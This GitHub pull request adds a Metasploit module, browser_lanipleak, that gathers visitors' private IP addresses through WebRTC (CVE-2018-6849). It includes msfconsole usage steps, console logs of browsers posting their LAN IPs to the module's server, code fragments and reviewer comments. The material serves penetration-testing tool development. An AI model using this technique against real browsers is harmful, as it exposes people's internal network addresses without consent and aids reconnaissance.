Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Private IP Leakage using WebRTC (CVE-2018-6849) #9823

Merged
merged 8 commits into from Apr 11, 2018
Merged

Conversation

@RootUp
Copy link
Contributor

@RootUp RootUp commented Apr 6, 2018

This library module will take advantage of WebRTC function in browsers to get private IP of the user/victim.

Verification

  • Start msfconsole
  • use auxiliary/gather/browser_lanipleak
  • set SRVHOST <IP of MSF system to act as server>
  • set SRVPORT <port of MSF system to act as server>
  • run
msf auxiliary(gather/browser_getprivateip) > 
[*] Using URL: http://172.20.10.2:8080/
[*] Server started.

msf auxiliary(gather/browser_getprivateip) >



msf auxiliary(gather/browser_getprivateip) > 
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Received reply:
POST / HTTP/1.1
Host: 172.20.10.2:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.20.10.2:8080/
Content-Length: 11
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

172.20.10.2

msf auxiliary(gather/browser_getprivateip) >

Note that there are some edge cases with this code. For example, it doesn't work on Firefox ESR on Kali 1.0.6.

),
'License' => MSF_LICENSE,
'Author' => [
'Brendan Coles', #MSF Module

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018
Contributor

Thanks, but I did nothing. I literally grabbed the first chunk of JS I found on GitHub and slapped it in the module.

send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018
Contributor

Please tidy up the output.

The print_* methods are preferred over puts.

Consider augmenting the JS to send a JSON object, and parsing the JS object here for output with print_good or print_line.

info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",
'Description' => %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018
Contributor

Please line wrap to max 120, preferably 80.

super(
update_info(
info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018
Contributor

Single quotes are preferred over double quotes when string interpolation is not required.

Also, remove the fullstop .

Also, module names are generally short and descriptive, rather than a sentence. Consider Browser LAN IP Leak or something.

[ 'CVE', '2018-6849' ],
['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
],
'DisclosureDate' => 'Jan 26 2018',

This comment has been minimized.

@bcoles

bcoles Apr 6, 2018
Contributor

This should probably be the date the WebRTC IP leak technique was published. The first instance I'm aware of was from https://github.com/natevw some time around 2014.

This comment has been minimized.

RootUp added 3 commits Apr 6, 2018
@RootUp
Copy link
Contributor Author

@RootUp RootUp commented Apr 6, 2018

Works perfect for now.

msf > use auxiliary/gather/browser_lanipleak 
msf auxiliary(gather/browser_lanipleak) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(gather/browser_lanipleak) > set URIPATH /
URIPATH => /
msf auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://127.0.0.1:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Received reply:
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/
Content-Length: 13
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

192.168.1.104

msf auxiliary(gather/browser_lanipleak) >
@s0m3gai
Copy link

@s0m3gai s0m3gai commented Apr 7, 2018

Neat! Just needs docs (example), looks like... 👍

RootUp added 2 commits Apr 10, 2018
Changed title name and description, however few things still needs to fix.
@RootUp
Copy link
Contributor Author

@RootUp RootUp commented Apr 10, 2018

So the output looks something like this for now,

msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://192.168.1.104:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Received reply:
Fetched Private IP: 192.168.1.103
[*] 192.168.1.103: Received reply:
Fetched Private IP: 2001:0:9d38:90d7:3889:2388:3f57:fe98

msf auxiliary(gather/browser_lanipleak) >
@bcoles
Copy link
Contributor

@bcoles bcoles commented Apr 10, 2018

Looking good.

I made some minor changes, like fixing up formatting.

I also removed the requirement for ipaddr. Instead, the module uses the same regex that's used in the JavaScript.

It was meant to be a PR on your repo, but apparently the GitHub web interface doesn't work like that, and it landed directly into your branch. My bad!

@bcoles
Copy link
Contributor

@bcoles bcoles commented Apr 10, 2018

msf5 auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 1.

[*] Using URL: http://0.0.0.0:8080/asdf
[*] Local IP: http://172.16.191.188:8080/asdf
[*] Server started.

msf5 auxiliary(gather/browser_lanipleak) > [*] 172.16.191.135: Sending response (2523 bytes)
[+] 172.16.191.135: Found IP address: 172.16.191.135
[*] 172.16.191.208: Sending response (2523 bytes)
[+] 172.16.191.208: Found IP address: 172.16.191.208
[+] 172.16.191.208: Found IP address: 172.16.191.178
Interrupt: use the 'exit' command to quit
@RootUp
Copy link
Contributor Author

@RootUp RootUp commented Apr 11, 2018

Okay, I have added documentation for same, please advise are we good to land here!

@acammack-r7 acammack-r7 merged commit 8b6bfcb into rapid7:master Apr 11, 2018
3 checks passed
3 checks passed
@metasploit-bot
Metasploit Automation - Sanity Test Execution Successfully ran sanity checks.
Details
@metasploit-bot
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
acammack-r7 added a commit that referenced this pull request Apr 11, 2018
@acammack-r7
Copy link
Contributor

@acammack-r7 acammack-r7 commented Apr 11, 2018

Thanks for the module! I added 7e4caa1 to give a little more sample output in the module documentation.

@acammack-r7 acammack-r7 self-assigned this Apr 11, 2018
@acammack-r7
Copy link
Contributor

@acammack-r7 acammack-r7 commented Apr 11, 2018

Release Notes

The auxiliary/gather/browser_lanipleak module has been added to the framework. This module leaks the local IPs of WebRTC-enabled browsers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants